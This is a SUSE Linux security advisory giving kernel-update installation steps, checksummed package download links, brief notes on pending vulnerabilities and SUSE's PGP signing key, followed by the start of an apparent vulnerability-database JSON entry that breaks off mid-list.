For those who wish to install their kernel updates manually and for 
those who use a SUSE Linux 8.0 system:

The following paragraphs will guide you through the installation
process in a step-by-step fashion. The character sequence "****"
marks the beginning of a new paragraph. In some cases, the steps
outlined in a particular paragraph may or may not be applicable
to your situation. 
Therefore, please make sure to read through all of the steps below
before attempting any of these procedures. 
All of the commands that need to be executed are required to be
run as the superuser (root). Each step relies on the steps before
it to complete successfully.

**** Step 1: Determine the needed kernel type

Please use the following command to find the kernel type that is
installed on your system:

  rpm -qf /boot/vmlinuz

Following are the possible kernel types (disregard the version and
build number following the name separated by the "-" character)

  k_deflt   # default kernel, good for most systems. 
  k_i386    # kernel for older processors and chipsets
  k_athlon  # kernel made specifically for AMD Athlon(tm) family processors
  k_psmp    # kernel for Pentium-I dual processor systems
  k_smp     # kernel for SMP systems (Pentium-II and above)
  k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM
  kernel-64k-pagesize
  kernel-bigsmp
  kernel-default
  kernel-smp

**** Step 2: Download the package for your system

Please download the kernel RPM package for your distribution with the
name as indicated by Step 1. The list of all kernel rpm packages is
appended below. Note: The kernel-source package does not
contain a binary kernel in bootable form. Instead, it contains the
sources that the binary kernel rpm packages are created from. It can be
used by administrators who have decided to build their own kernel. 
Since the kernel-source.rpm is an installable (compiled) package that
contains sources for the linux kernel, it is not the source RPM for
the kernel RPM binary packages.

The kernel RPM binary packages for the distributions can be found at the
locations below ftp://ftp.suse.com/pub/suse/i386/update/.

  8.0/images/
  8.1/rpm/i586
  8.2/rpm/i586
  9.0/rpm/i586
  9.1/rpm/i586

After downloading the kernel RPM package for your system, you should
verify the authenticity of the kernel rpm package using the methods as
listed in section 3) of each SUSE Security Announcement.

**** Step 3: Installing your kernel rpm package

Install the rpm package that you have downloaded in Steps 3 or 4 with
the command
    rpm -Uhv --nodeps --force <K_FILE.RPM>
where <K_FILE.RPM> is the name of the rpm package that you downloaded.

Warning: After performing this step, your system will likely not be
         able to boot if the following steps have not been fully
         followed.


If you run SUSE LINUX 8.1 and haven't applied the kernel update
(SUSE-SA:2003:034), AND you are using the freeswan package, you also
need to update the freeswan rpm as a dependency as offered
by YOU (YaST Online Update). The package can be downloaded from
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/

**** Step 4: configuring and creating the initrd

The initrd is a ramdisk that is loaded into the memory of your
system together with the kernel boot image by the bootloader. The
kernel uses the content of this ramdisk to execute commands that must
be run before the kernel can mount its actual root filesystem. It is
usually used to initialize SCSI drivers or NIC drivers for diskless
operation.

The variable INITRD_MODULES in /etc/sysconfig/kernel determines
which kernel modules will be loaded in the initrd before the kernel
has mounted its actual root filesystem. The variable should contain
your SCSI adapter (if any) or filesystem driver modules.

With the installation of the new kernel, the initrd has to be
re-packed with the update kernel modules. Please run the command

  mk_initrd

as root to create a new init ramdisk (initrd) for your system. 
On SuSE Linux 8.1 and later, this is done automatically when the
RPM is installed.

**** Step 5: bootloader

If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there
are two options:
Depending on your software configuration, you have either the lilo
bootloader or the grub bootloader installed and initialized on your
system. 
The grub bootloader does not require any further actions to be
performed after the new kernel images have been moved in place by the
rpm Update command. 
If you have a lilo bootloader installed and initialized, then the lilo
program must be run as root. Use the command

  grep LOADER_TYPE /etc/sysconfig/bootloader

to find out which boot loader is configured. If it is lilo, then you
must run the lilo command as root. If grub is listed, then your system
does not require any bootloader initialization.

Warning: An improperly installed bootloader may render your system
         unbootable.

**** Step 6: reboot

If all of the steps above have been successfully completed on your
system, then the new kernel including the kernel modules and the
initrd should be ready to boot. The system needs to be rebooted for
the changes to become active. Please make sure that all steps have
completed, then reboot using the command
    shutdown -r now
or
    init 6

Your system should now shut down and reboot with the new kernel.


There is no workaround known.


Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement. 
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update. 
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.





x86 Platform:

SUSE Linux 9.1:
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.95.i586.rpm
  800418d3dddf6d3b83925f562842205a
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.95.i586.rpm
  0cb990b159e10685bb29b76d312ddd25
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm
  7446bb70f52bce57a914066be4ed8e45
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm
  7446bb70f52bce57a914066be4ed8e45
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.95.i586.rpm
  ede031495ee19d8b6eca1873e7155332
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm
  620ef40226fec31a773397cf3051bf36
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm
  9b61b5a70b304f5554cb18a6bae5b5fd
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.95.nosrc.rpm
  227c85280ee17a66c8590fe1bb14c596
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm
  895fee3033de0810ff1173ce8ee87936

SUSE Linux 9.0:
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-231.i586.rpm
  48be395b96329909486ae3a5152348fa
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-231.i586.rpm
  4cd322b4f511d5fe4c483ed28a82097e
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-231.i586.rpm
  262e33cebf1b0d35fb6d3235c9ab8815
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-231.i586.rpm
  8d81370f90736b12aa71b9c744f6e0e2
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-231.i586.rpm
  bc59c838c84ba318dc4d24da08a3022e
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-231.i586.rpm
  f9586ba982e0398c3e48871955b661aa
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm
  18673b0bf347fe9557d4e67ca02000c0
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-231.src.rpm
  71496daac44196b0e0a3836ee6a3b4ed
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm
  7c208e9e3f7be1a68c3c8457eb2cafc4
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-231.src.rpm
  b77863c863aaf4b931bff263220e6ec9
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-231.src.rpm
  bed7e964e22c5e5d2f5e7a5e3816dde4
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm
  6b5137bf379fbfc861441151039575da

SUSE Linux 8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-115.i586.rpm
  50d261b44616f9145a0dc16df501a504
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-115.i586.rpm
  10095854c0bdae20991d90b822352e14
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-115.i586.rpm
  a2ef7cfb0e62ad955dda2b0574eb3150
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-115.i586.rpm
  1d2b0d0e2c7998685ed04c24e593b196
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-115.i586.rpm
  d8bf98c46ba5313db286d5706f7fb3b8
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-115.src.rpm
  e13a7b4c2b185cfeb991c31607f79ccb
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-115.src.rpm
  0e2f2cf20e7d7a20f3e50b245105df61
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-115.src.rpm
  6cfac2914d3827ec562ff9d6be29c566
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-115.src.rpm
  afd29843aa69d805ef5f25d39ecd0e7f
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-115.src.rpm
  098a1400a48404931acb8b3eb2e821fb

SUSE Linux 8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-231.i586.rpm
  3bdaa593d09a7cbff632a2c4446d5603
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-231.i586.rpm
  ba60d0b2b6d3bc9c38b4e8b3859e1586
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-231.i586.rpm
  ffa8983669004826a0cbedbe34dced76
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-231.i586.rpm
  25174fd007f5a39ee0342dd6f18f2eaa
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-231.i586.rpm
  10837fa561cd5104e55d48e46c837764
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-231.src.rpm
  c37e8b87819602e77b14206affef00fa
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-231.src.rpm
  7be68a677db5a65be1a46ec194b35497
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-231.src.rpm
  8e4b7d5a6bb81da5a00971cdcc4ec641
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-231.src.rpm
  d8ba1db81a9b517f867c970e4fc443a7
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-231.src.rpm
  96a0a9242d066083c7bff8e0f70b7bbe

SUSE Linux 8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-303.i386.rpm
  ec1e53b3812c0c0bd3681435d69fb134
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-303.i386.rpm
  583164e52019ae090fd47e425c2a933e
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-303.i386.rpm
  9ac8983abef05697d75f3117e37e5f18
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-303.i386.rpm
  4932c4d6a42fc9be02013f398ab5bb96
ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-303.i386.rpm
  b9de0731f9bbc4b016455a6d52cd8296
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-303.src.rpm
  a73bacad80432c26e856c41338b154bd
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-303.src.rpm
  782902cd14e7776db66bd61a12beee03
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-303.src.rpm
  d71fa5cda488ae18f8d023cd8f28bb73
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-303.src.rpm
  a360a9e6ed2db54f69e17db36f02614f
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-303.nosrc.rpm
  8017fd6ff8a6fc1a0660ab35ad174388



x86-64 Platform:

SUSE Linux 9.1:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.95.x86_64.rpm
  e2c53fd24991f739fd754c07f7aa8293
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.95.x86_64.rpm
  f4a69622b7628cdd662a4e39aa59b60e
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.95.x86_64.rpm
  e71adfb1fc662600eb11d3acf67c3dc3
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm
  f6a364879d1f2ae2cf854810d61be3ac
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm
  a0096d1fc067d89c9200ea3904713d59
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm
  bf6d0439cfc37b50b4f6822c3403a74f

SUSE Linux 9.0:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-231.x86_64.rpm
  17e008a737e5e95e71335e34fa7f86cf
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-231.x86_64.rpm
  ca742b550b1a503595b02cbfc9e0e481
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-231.x86_64.rpm
  8e0c16c42d1a89aa6a09be1dd575de47
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm
  58b1bf42b5661119d06a04888144707a
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm
  5103001136e39fca5a59f4cbde82822b
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm
  231c9e5e00f17df8cfd72d6c8a68d9cf

2) Pending vulnerabilities in SUSE Distributions and Workarounds:

- icecast
The icecast service is vulnerable to a remote denial-of-service
attack. Update packages will be available soon.

- sitecopy
The sitecopy package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.

- cadaver
The cadaver package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.

- OpenOffice_org
The OpenOffice_org package includes a vulnerable version
of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages
will be available soon.

- tripwire
A format string bug in tripwire can be exploited locally
to gain root permissions. 
New packages are available.

- postgresql
A buffer overflow in psqlODBC could be exploited to crash the
application using it. E.g. a PHP script that uses ODBC to access a
PostgreSQL database can be utilized to crash the surrounding Apache
web-server. Other parts of PostgreSQL are not affected. 
New packages are available.

- XDM/XFree86
This update resolves random listening to ports by XDM
that allows to connect via the XDMCP. SUSE LINUX 9.1
is affected only. 
New packages are available.

- mod_proxy
A buffer overflow can be triggered by malicious remote
servers that return a negative Content-Length value. 
This vulnerability can be used to execute commands remotely
New packages are available.

- freeswan
A bug in the certificate chain authentication code could allow an
attacker to authenticate any host against a FreeS/WAN server by
presenting specially crafted certificates wrapped in a PKCS#7 file. 
The packages are currently being tested and will be available soon.

- ipsec-tools
The racoon daemon which is responsible for handling IKE messages
fails to reject invalid or self-signed X.509 certificates which
allows for man-in-the-middle attacks on IPsec tunnels established
via racoon. 
The packages are currently being tested and will be available soon.

- less
This update fixes a possible symlink attack in lessopen.sh. The
attack can be executed by local users to overwrite arbitrary files
with the privileges of the user running less. 
New packages are available.

- libpng
This update adds a missing fix for CAN-2002-1363. 
New packages are available.

- pavuk
This update fixes a remotely exploitable buffer overflow in pavuk. 
Thanks to Ulf Harnhammar for reporting this to us. 
New packages are available.

- kdebase3
This update fixes a possible attack on tmp files created at the
first login of a user using KDE or at the first time running a
KDE application. This bug can be exploited locally to overwrite
arbitrary files with the privilege of the victim user. 
Just affects SUSE LINUX 9.1
New packages are available.

3) standard appendix: authenticity verification, additional information

  • Package authenticity verification:

    SUSE update packages are available on many mirror ftp servers around the world. While this service is considered valuable and important to the free and open source software community, many users wish to be certain as to be the origin of the package and its content before installing the package. There are two independent verification methods that can be used to prove the authenticity of a downloaded file or rpm package: 1) md5sums as provided in the (cryptographically signed) announcement. 2) using the internal gpg signatures of the rpm package.

    1) execute the command md5sum after you have downloaded the file from a SUSE ftp server or its mirrors. Then, compare the resulting md5sum with the one that is listed in the announcement. Since the announcement containing the checksums is cryptographically signed (usually using the key security@suse.de), the checksums offer proof of the authenticity of the package. We recommend against subscribing to security lists which cause the email message containing the announcement to be modified so that the signature does not match after transport through the mailing list software. Downsides: You must be able to verify the authenticity of the announcement in the first place. If RPM packages are being rebuilt and a new version of a package is published on the ftp server, all md5 sums for the files are useless.

    2) rpm package signatures provide an easy way to verify the authenticity of an rpm package. Use the command rpm -v --checksig to verify the signature of the package, where is the filename of the rpm package that you have downloaded. Of course, package authenticity verification can only target an un-installed rpm package file. Prerequisites: a) gpg is installed b) The package is signed using a certain key. The public part of this key must be installed by the gpg program in the directory ~/.gnupg/ under the user's home directory who performs the signature verification (usually root). You can import the key that is used by SUSE in rpm packages for SUSE Linux by saving this announcement to a file ("announcement.txt") and running the command (do "su -" to be root): gpg --batch; gpg < announcement.txt | gpg --import SUSE Linux distributions version 7.1 and thereafter install the key "build@suse.de" upon installation or upgrade, provided that the package gpg is installed. The file containing the public key is placed at the top-level directory of the first CD (pubring.gpg) and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .

  • SUSE runs two security mailing lists to which any interested party may subscribe:

    suse-security@suse.com - general/linux/SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an email to suse-security-subscribe@suse.com.

    suse-security-announce@suse.com - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an email to suse-security-announce-subscribe@suse.com.

    For general information or the frequently asked questions (faq) send mail to: suse-security-info@suse.com or suse-security-faq@suse.com respectively.

    ===================================================================== SUSE's security contact is security@suse.com or security@suse.de. The security@suse.de public key is listed below. =====================================================================


    The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, it is desired that the clear-text signature must show proof of the authenticity of the text. SUSE Linux AG makes no warranties of any kind whatsoever with respect to the information contained in this security advisory.

Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team security@suse.de pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key build@suse.de

-----BEGIN PGP PUBLIC KEY BLOCK-----

Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org

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 DgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= =LRKC - -----END PGP PUBLIC KEY BLOCK-----


  • - | Roman Drahtm\xfcller draht@suse.de // "You don't need eyes to see, | SUSE Linux AG - Security Phone: // you need vision!" | N\xfcrnberg, Germany +49-911-740530 // Maxi Jazz, Faithless |
  • - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux)

iQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy Bi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt OsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD jwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA iud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT WntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ== =24bz -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200408-0086",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "8.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "9.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
